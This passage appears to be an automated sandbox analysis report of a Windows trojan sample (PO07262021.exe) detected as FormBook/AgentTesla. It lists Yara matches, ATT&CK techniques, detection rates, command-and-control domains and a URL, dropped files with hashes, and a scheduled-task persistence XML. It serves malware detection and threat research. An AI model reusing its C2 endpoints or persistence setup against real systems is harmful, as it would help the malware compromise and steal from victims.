          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\PO07262021.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 15_2_011E7513 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,15_2_011E7513
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 15_2_011D443C GetVersion,15_2_011D443C
          Source: C:\Users\user\Desktop\PO07262021.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match File source: 7.2.PO07262021.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 7.2.PO07262021.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000F.00000002.912674126.0000000003A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.765614509.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.767554983.0000000001150000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.767309184.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.912452970.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.911713317.0000000001050000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts 1 | Scheduled Task/Job 1 | Valid Accounts 1 | Valid Accounts 1 | Rootkit 1 | Credential API Hooking 1 | System Time Discovery 1 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules 1 | Scheduled Task/Job 1 | Access Token Manipulation 1 | Masquerading 1 | LSASS Memory | Security Software Discovery 241 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 612 | Valid Accounts 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Scheduled Task/Job 1 | Access Token Manipulation 1 | NTDS | Virtualization/Sandbox Evasion 31 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 12 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Disable or Modify Tools 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 31 | Cached Domain Credentials | File and Directory Discovery 2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 612 | DCSync | System Information Discovery 125 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Obfuscated Files or Information 31 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Software Packing 2 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

          [Behavior graph image not reproduced. Behavior Graph ID: 458795; Sample: PO07262021.exe; Startdate: 03/08/2021; Architecture: WINDOWS; Score: 100]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          PO07262021.exe | 59% | Virustotal |
          PO07262021.exe | 11% | Metadefender |
          PO07262021.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
          PO07262021.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe | 11% | Metadefender |
          C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla

          Unpacked PE Files

          Source | Detection | Scanner | Label
          7.2.PO07262021.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          winabeel.com | 2% | Virustotal |
          www.winabeel.com | 1% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
          http://www.tiro.com | 0% | URL Reputation | safe
          http://www.goodfont.co.kr | 0% | URL Reputation | safe
          http://www.carterandcone.coml | 0% | URL Reputation | safe
          http://www.founder.com.cn/cnD | 0% | Avira URL Cloud | safe
          http://www.sajatypeworks.com | 0% | URL Reputation | safe
          http://www.typography.netD | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
          http://fontfabrik.com | 0% | URL Reputation | safe
          http://www.founder.com.cn/cn | 0% | URL Reputation | safe
          http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
          http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.sandoll.co.kr | 0% | URL Reputation | safe
          http://www.urwpp.deDPlease | 0% | URL Reputation | safe
          http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
          http://www.sakkal.com | 0% | URL Reputation | safe
          http://www.winabeel.com/nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0p | 0% | Avira URL Cloud | safe
          www.cryptoinhindi.online/nmks/ | 0% | Avira URL Cloud | safe
          https://static.hummingbird.me/anime/poster_images/000/010/716/large/0fd8df1b586e60a0b1591cd8555c072f | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          winabeel.com | 34.102.136.180 | true | false | | unknown
          www.winabeel.com | unknown | unknown | true | | unknown
          www.ppneumatic.com | unknown | unknown | true | | unknown

            Contacted URLs

            Name | Malicious | Antivirus Detection | Reputation
            http://www.winabeel.com/nmks/?6latBtaX=AODdElP/LvmD82bfBWBMQGTCd+0C8NCj5PjqI400wXLHipc47/wHi7nKSi/3AqembaQc&v2M=nRRXGl0p | false | Avira URL Cloud: safe | unknown
            www.cryptoinhindi.online/nmks/ | true | Avira URL Cloud: safe | low

            URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
                                http://www.sandoll.co.krexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.urwpp.deDPleaseexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.zhongyicts.com.cnexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.sakkal.comexplorer.exe, 00000009.00000000.724367987.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://i.imgur.com/blkrqBo.gifPO07262021.exefalse
                                  high
                                  https://static.hummingbird.me/anime/poster_images/000/010/716/large/0fd8df1b586e60a0b1591cd8555c072fPO07262021.exefalse
                                  • Avira URL Cloud: safe
                                  unknown

                                  Contacted IPs


                                  Public

                                  IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                  34.102.136.180 | winabeel.com | United States | | 15169 | GOOGLEUS | false

                                  General Information

                                  Joe Sandbox Version:33.0.0 White Diamond
                                  Analysis ID:458795
                                  Start date:03.08.2021
                                  Start time:18:51:07
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 11m 1s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:PO07262021.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.evad.winEXE@10/4@2/1
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 13.4% (good quality ratio 13.1%)
                                  • Quality average: 79.7%
                                  • Quality standard deviation: 24.1%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 32
                                  • Number of non-executed functions: 284
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  Warnings:
                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                  • Excluded IPs from analysis (whitelisted): 52.113.196.254, 168.61.161.212, 20.50.102.62, 52.114.132.73, 13.107.5.88, 13.107.42.23, 23.211.5.146, 13.88.21.125, 23.211.6.115, 104.42.151.234, 20.82.210.154, 67.26.73.254, 8.253.207.120, 8.248.117.254, 8.248.137.254, 8.248.115.254, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211, 20.82.209.183
                                  • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, ocos-office365-s2s.msedge.net, client-office365-tas.msedge.net, config.edge.skype.com.trafficmanager.net, browser.events.data.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, teams-9999.teams-msedge.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, config.edge.skype.com, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, afdo-tas-offload.trafficmanager.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcoleus04.cloudapp.net, l-0014.l-msedge.net, e16646.dscg.akamaiedge.net, teams-ring.teams-9999.teams-msedge.net, teams-ring.msedge.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, browser.pipe.aria.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                  • Not all processes were analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  Time | Type | Description
                                  18:52:16 | API Interceptor | 1x Sleep call for process: PO07262021.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO07262021.exe.log
                                  Process:C:\Users\user\Desktop\PO07262021.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:modified
                                  Size (bytes):1314
                                  Entropy (8bit):5.350128552078965
                                  Encrypted:false
                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                  Malicious:true
                                  Reputation:high, very likely benign file
                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                  C:\Users\user\AppData\Local\Temp\tmpB7D9.tmp
                                  Process:C:\Users\user\Desktop\PO07262021.exe
                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):1644
                                  Entropy (8bit):5.19094573353388
                                  Encrypted:false
                                  SSDEEP:24:2dH4+SEqC/S7hblNMFp//rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBG8tn:cbhK79lNQR/rydbz9I3YODOLNdq33
                                  MD5:23D2D2B433F0ED44159491AFDD24534F
                                  SHA1:E70CB7AC5A0D0EB8BFD3352D0A4CFF41B3BB251B
                                  SHA-256:DB595180719394A5059F3AB34F47925DFEFB13B7C5F7017CD4E269D3EDFCA22A
                                  SHA-512:D9A3B13061BF0CE4FC39426C390C9D02A421BC78D6FFB83E47C9620E7B0E4911B938C8BA798A6A7821230ECC987EC674C2D951894F3980D44B029B398E8FAF3F
                                  Malicious:true
                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                  C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe
                                  Process:C:\Users\user\Desktop\PO07262021.exe
                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Category:dropped
                                  Size (bytes):978432
                                  Entropy (8bit):6.936798195289582
                                  Encrypted:false
                                  SSDEEP:24576:aZWQnL8RS/d3YK64JZBVGbDGLPWNfac2SppPr7:aoQnQK64JIbQchpZ
                                  MD5:47A679EC6799A5A2C9212DE73D404A83
                                  SHA1:D21C87A07B4701DDF3206AEB534D010DD928116B
                                  SHA-256:C2E765B8A42432E042DA5C444BDBA20B8021BD5E1B022693978B6540FDBDDEC7
                                  SHA-512:20133EAA9C49F4239684703F312413F1AB1AA4868E2DC0636F449903A27B9C7686E62093EBE8DBF588C9D159FA47F790CEEBA58FFDFC791FC753B25552458763
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  • Antivirus: Metadefender, Detection: 11%, Browse
                                  • Antivirus: ReversingLabs, Detection: 74%
                                  C:\Users\user\AppData\Roaming\FzGSUpCvLNF.exe:Zone.Identifier
                                  Process:C:\Users\user\Desktop\PO07262021.exe
                                  File Type:ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):26
                                  Entropy (8bit):3.95006375643621
                                  Encrypted:false
                                  SSDEEP:3:ggPYV:rPYV
                                  MD5:187F488E27DB4AF347237FE461A079AD
                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                  Malicious:true
                                  Preview: [ZoneTransfer]....ZoneId=0

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):6.936798195289582
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                  • Windows Screen Saver (13104/52) 0.07%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  File name:PO07262021.exe
                                  File size:978432
                                  MD5:47a679ec6799a5a2c9212de73d404a83
                                  SHA1:d21c87a07b4701ddf3206aeb534d010dd928116b
                                  SHA256:c2e765b8a42432e042da5c444bdba20b8021bd5e1b022693978b6540fdbddec7
                                  SHA512:20133eaa9c49f4239684703f312413f1ab1aa4868e2dc0636f449903a27b9c7686e62093ebe8dbf588c9d159fa47f790ceeba58ffdfc791fc753b25552458763
                                  SSDEEP:24576:aZWQnL8RS/d3YK64JZBVGbDGLPWNfac2SppPr7:aoQnQK64JIbQchpZ

                                  File Icon

                                  Icon Hash:00828e8e8686b000

                                  Static PE Info

                                  General

                                  Entrypoint:0x4f011e
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                  Time Stamp:0x61019565 [Wed Jul 28 17:35:33 2021 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:v4.0.30319
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Entrypoint Preview

                                  Instruction
                                  jmp dword ptr [00402000h]
                                  add byte ptr [eax], al

                                  Data Directories

                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf00cc | 0x4f | .text
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf2000 | 0x620 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf4000 | 0xc | .reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                  Sections

                                  Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  .text | 0x2000 | 0xee124 | 0xee200 | False | 0.606308439961 | data | 6.94520727658 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                  .rsrc | 0xf2000 | 0x620 | 0x800 | False | 0.32958984375 | data | 3.45050290848 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc | 0xf4000 | 0xc | 0x200 | False | 0.044921875 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                  Resources

                                  Name | RVA | Size | Type | Language | Country
                                  RT_VERSION | 0xf2090 | 0x390 | data | |
                                  RT_MANIFEST | 0xf2430 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                  Imports

                                  DLL | Import
                                  mscoree.dll | _CorExeMain

                                  Version Infos

                                  Description | Data
                                  Translation | 0x0000 0x04b0
                                  LegalCopyright | Copyright Microsoft 2014
                                  Assembly Version | 1.0.0.0
                                  InternalName | cAlternateFileNameeFixedBuff.exe
                                  FileVersion | 1.0.0.0
                                  CompanyName | Microsoft
                                  LegalTrademarks |
                                  Comments |
                                  ProductName | QManager
                                  ProductVersion | 1.0.0.0
                                  FileDescription | QManager
                                  OriginalFilename | cAlternateFileNameeFixedBuff.exe

                                  Network Behavior

                                  Snort IDS Alerts

                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                  08/03/21-18:53:29.146784 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49763 | 34.102.136.180 | 192.168.2.4

                                  Network Port Distribution

                                  TCP Packets

                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Aug 3, 2021 18:53:29.010590076 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
                                  Aug 3, 2021 18:53:29.028125048 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4
                                  Aug 3, 2021 18:53:29.028268099 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
                                  Aug 3, 2021 18:53:29.028569937 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
                                  Aug 3, 2021 18:53:29.045883894 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4
                                  Aug 3, 2021 18:53:29.146784067 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4
                                  Aug 3, 2021 18:53:29.153759003 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4
                                  Aug 3, 2021 18:53:29.158879042 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
                                  Aug 3, 2021 18:53:29.158911943 CEST | 49763 | 80 | 192.168.2.4 | 34.102.136.180
                                  Aug 3, 2021 18:53:29.176242113 CEST | 80 | 49763 | 34.102.136.180 | 192.168.2.4

                                  UDP Packets

                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                  Aug 3, 2021 18:51:53.910123110 CEST6454953192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:53.939091921 CEST53645498.8.8.8192.168.2.4
                                  Aug 3, 2021 18:51:55.449043989 CEST6315353192.168.2.48.8.8.8
                                  Aug 3, 2021 18:51:55.484652042 CEST53631538.8.8.8192.168.2.4
